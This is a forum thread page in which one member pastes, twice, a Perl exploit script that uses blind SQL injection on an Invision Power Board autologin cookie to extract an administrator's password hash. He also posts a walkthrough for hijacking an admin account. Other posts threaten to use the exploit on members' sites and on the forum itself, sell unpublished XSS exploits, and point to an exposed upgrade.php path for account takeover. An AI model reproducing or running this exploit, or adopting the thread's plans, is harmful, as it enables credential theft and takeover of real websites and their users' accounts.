Page 1 of 8 123 ... LastLast
Results 1 to 30 of 218
  1. Collapse Details
    sence i am being punished for doing nil .its time to give you a reason then . 
    #1
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    just for the ppl that have been wronged code for admin pass word
    #!/usr/bin/perl -w################################################################### This one actually works :) Just paste the outputted cookie into# your request header using livehttpheaders or something and you# will probably be logged in as that user. No need to decrypt it!# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com###############...###########use LWP::UserAgent;$ua = new LWP::UserAgent;$ua->agent("Mosiac 1.0" . $ua->agent);if (!$ARGV[0]) {$ARGV[0] = '';}if (!$ARGV[3]) {$ARGV[3] = '';}my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; # userid to jackmy $iver = $ARGV[2]; # version 1 or 2my $cpre = $ARGV[3]; # cookie prefixmy $dbug = $ARGV[4]; # debug?if (!$ARGV[2]){print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";exit;}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");my $outputs = '';for( $i=1; $i < 33; $i++ ){for( $j=0; $j < 16; $j++ ){my $current = $charset[$j];my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);my $res = $ua->get($path, @cookie);# If we get a valid sql request then this# does not appear anywhere in the sources$pattern = '';$_ = $res->content;
    Reply With Quote
     

  2. Collapse Details
     
    #2
    steveyos
    king steveyos
    Reply With Quote
     

  3. Collapse Details
     
    #3
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    I AM GOING TO USE THAT CODE ON YOUR SITE STEVEYO.
    Reply With Quote
     

  4. Collapse Details
     
    #4
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member wewish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2". Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulationaround these forums. For those who don't have it, here:CODE#!/usr/bin/perl -w################################################################### This one actually works :) Just paste the outputted cookie into# your request header using livehttpheaders or something and you# will probably be logged in as that user. No need to decrypt it!# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com###############...###########use LWP::UserAgent;$ua = new LWP::UserAgent;$ua->agent("Mosiac 1.0" . $ua->agent);if (!$ARGV[0]) {$ARGV[0] = '';}if (!$ARGV[3]) {$ARGV[3] = '';}my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; # userid to jack my $iver = $ARGV[2]; # version 1 or 2my $cpre = $ARGV[3]; # cookie prefixmy $dbug = $ARGV[4]; # debug?if (!$ARGV[2]){print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";exit;}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");my $outputs = '';for( $i=1; $i < 33; $i++ ){for( $j=0; $j < 16; $j++ ){my $current = $charset[$j];my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);my $res = $ua->get($path, @cookie);# If we get a valid sql request then this# does not appear anywhere in the sources$pattern = '';$_ = $res->content;if ($dbug) { print };if ( !(/$pattern/) )
    Reply With Quote
     

  5. Collapse Details
     
    #5
    Senior Member Obnoxious Bitch's Avatar
    Join Date
    Dec 2012
    Posts
    1,188
    Quote Originally Posted by asux View Post
    I AM GOING TO USE THAT CODE ON YOUR SITE STEVEYO.
    How about on this site?
    Quote Originally Posted by rubycalaber View Post
    huh, good deal, I'd love to ban the three posters that cause the most activity, that's a smart way to run a dying troll forum
    Reply With Quote
     

  6. Collapse Details
     
    #6
    full metal merchant timmy's Avatar
    Join Date
    Sep 2008
    Location
    i daer you to make it out of ferguson alive
    Posts
    19,565
    SQL injection doesnt work here dumb fuck
    *call centre crew*
    *hate talking to people crew*
    *get abused for a living crew*
    *sexually harassed by hot women crew*
    Reply With Quote
     

  7. Collapse Details
     
    #7
    full metal merchant timmy's Avatar
    Join Date
    Sep 2008
    Location
    i daer you to make it out of ferguson alive
    Posts
    19,565

    $PATH
    *call centre crew*
    *hate talking to people crew*
    *get abused for a living crew*
    *sexually harassed by hot women crew*
    Reply With Quote
     

  8. Collapse Details
     
    #8
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    it will when i fine a vulnerability .and y whant it work barry ?
    Last edited by asux; 09-16-2013 at 07:52 AM.
    Reply With Quote
     

  9. Collapse Details
     
    #9
    full metal merchant timmy's Avatar
    Join Date
    Sep 2008
    Location
    i daer you to make it out of ferguson alive
    Posts
    19,565
    this site isnt vulnerable to php mysql attempts, youre retarded
    *call centre crew*
    *hate talking to people crew*
    *get abused for a living crew*
    *sexually harassed by hot women crew*
    Reply With Quote
     

  10. Collapse Details
     
    #10
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    Quote Originally Posted by cbarry View Post
    this site isnt vulnerable to php mysql attempts, youre retarded
    IS THAT YOUR ANSWER BARRY .
    Reply With Quote
     

  11. Collapse Details
     
    #11
    ᕦ(ò__ó)ᕤ rootbeer's Avatar
    Join Date
    Dec 2011
    Location
    Iron Hands fried chicken Chiang Mai technical college
    Posts
    11,875
    i hope this forum gets hacked down just like the last one
    Reply With Quote
     

  12. Collapse Details
     
    #12
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439

    barry is that why it want work becouse i am a retard mmmmkay .you are so so smart it must be true .
    Reply With Quote
     

  13. Collapse Details
     
    #13
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439

    witch one is cbarry ?
    dumbass
    Reply With Quote
     

  14. Collapse Details
     
    #14
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    send me 50 bucks and i will give you the 4 xss exploits i have for this version of vbulletin
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  15. Collapse Details
     
    #15
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    why would i do that when ill get it for free ?
    Reply With Quote
     

  16. Collapse Details
     
    #16
    my weapons turn me into a m0nde's Avatar
    Join Date
    Dec 2011
    Location
    every once in a while
    Posts
    30,078
    find the upgrade.php and get ruby's customer number
    i think clay was smart enough to delete teh install directory and move the admin path, but who knows

    Reply With Quote
     

  17. Collapse Details
     
    #17
    my weapons turn me into a m0nde's Avatar
    Join Date
    Dec 2011
    Location
    every once in a while
    Posts
    30,078
    ahahha, trying to use an ancient as fuck ipboard exploit on vb4
    okay

    Reply With Quote
     

  18. Collapse Details
     
    #18
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    because they are not published anywhere, and all you know how to do is google vbulliten exploit, send me the money, and u can pwn the fuck out of an autistic guys message board
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  19. Collapse Details
     
    #19
    my weapons turn me into a m0nde's Avatar
    Join Date
    Dec 2011
    Location
    every once in a while
    Posts
    30,078
    if you want to try real vb xss or sql injection go ask milksnack for a real exploit, this is some useless shit that won't work on vb4.2
    i hope asux was joking when he posted this shit

    Reply With Quote
     

  20. Collapse Details
     
    #20
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843


    htps://www.google.com/search?q=vbulliten+exploit
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  21. Collapse Details
     
    #21
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    i wrote a bunch of xss rep exploits for rep boosting u want them send me the 50 bux
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  22. Collapse Details
     
    #22
    full metal merchant timmy's Avatar
    Join Date
    Sep 2008
    Location
    i daer you to make it out of ferguson alive
    Posts
    19,565
    Clay patched up all pleb exploits. If elz can't do it why could anusex guy
    *call centre crew*
    *hate talking to people crew*
    *get abused for a living crew*
    *sexually harassed by hot women crew*
    Reply With Quote
     

  23. Collapse Details
     
    #23
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    Quote Originally Posted by m0nde View Post
    find the upgrade.php and get ruby's customer number
    i think clay was smart enough to delete teh install directory and move the admin path, but who knows
    well he will have to move it again soon lol
    Reply With Quote
     

  24. Collapse Details
     
    #24
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    http://rubycalaber.com/forums/install/upgrade.php

    nope it's in the default path,
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  25. Collapse Details
     
    #25
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    Quote Originally Posted by Autistic Spectrum View Post
    because they are not published anywhere, and all you know how to do is google vbulliten exploit, send me the money, and u can pwn the fuck out of an autistic guys message board
    no .i am going for maks acc
    Reply With Quote
     

  26. Collapse Details
     
    #26
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    good luck finding his customer number, i guess you could ask him for it??
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  27. Collapse Details
     
    #27
    mr retard to you asux's Avatar
    Join Date
    Sep 2013
    Posts
    1,439
    Quote Originally Posted by Autistic Spectrum View Post
    wrong one .
    Reply With Quote
     

  28. Collapse Details
     
    #28
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    you want ruby's accont, then when u are admin u can do whatever, de-mod everyone first thing, and make me admin and we will rule over rubycalber.com for 1000 years
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  29. Collapse Details
     
    #29
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

  30. Collapse Details
     
    #30
    ส็็็็็็็็็็็็ส็็็็็็ ็็็็็ Autistic Spectrum's Avatar
    Join Date
    Dec 1969
    Location
    ส็็็็็็็็็็็็ส&#
    Posts
    50,843
    YOUR WELCOME,
    I am the owner of http://www.ezmangaforum.com
    Reply With Quote
     

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

monde is a whiney fuck